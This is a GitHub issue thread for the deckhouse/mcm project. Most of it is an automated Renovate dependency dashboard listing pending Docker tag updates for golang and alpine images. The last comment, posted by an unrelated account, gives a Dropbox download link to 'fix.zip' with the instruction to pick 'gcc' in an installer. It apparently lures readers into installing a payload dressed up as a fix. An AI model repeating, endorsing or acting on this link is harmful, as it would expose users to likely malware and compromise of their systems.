### ISSUE TITLE
Dependency Dashboard

### ISSUE THREAD

**Issue by alexey-igrychev** [deckhouse/mcm#10]
This issue lists Renovate updates and detected dependencies. Read the [Dependency Dashboard](https://docs.renovatebot.com/key-concepts/dashboard/) docs to learn more.

## Open

These updates have all been created already. Click a checkbox below to force a retry/rebase of any.

 - [ ] [Pin dependencies](../pull/8) (`eu.gcr.io/gardener-project/3rd/alpine`, `eu.gcr.io/gardener-project/3rd/golang`)
 - [ ] [Update eu.gcr.io/gardener-project/3rd/alpine Docker tag to v3.18.4](../pull/9)
 - [ ] [Update eu.gcr.io/gardener-project/3rd/golang Docker tag to v1.20.2](../pull/12)
 - [ ] **Click on this checkbox to rebase all open PRs at once**

## Detected dependencies

<details><summary>dockerfile</summary>
<blockquote>

<details><summary>Dockerfile</summary>

 - `eu.gcr.io/gardener-project/3rd/golang 1.15.5`
 - `eu.gcr.io/gardener-project/3rd/alpine 3.12.1`

</details>

</blockquote>
</details>

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
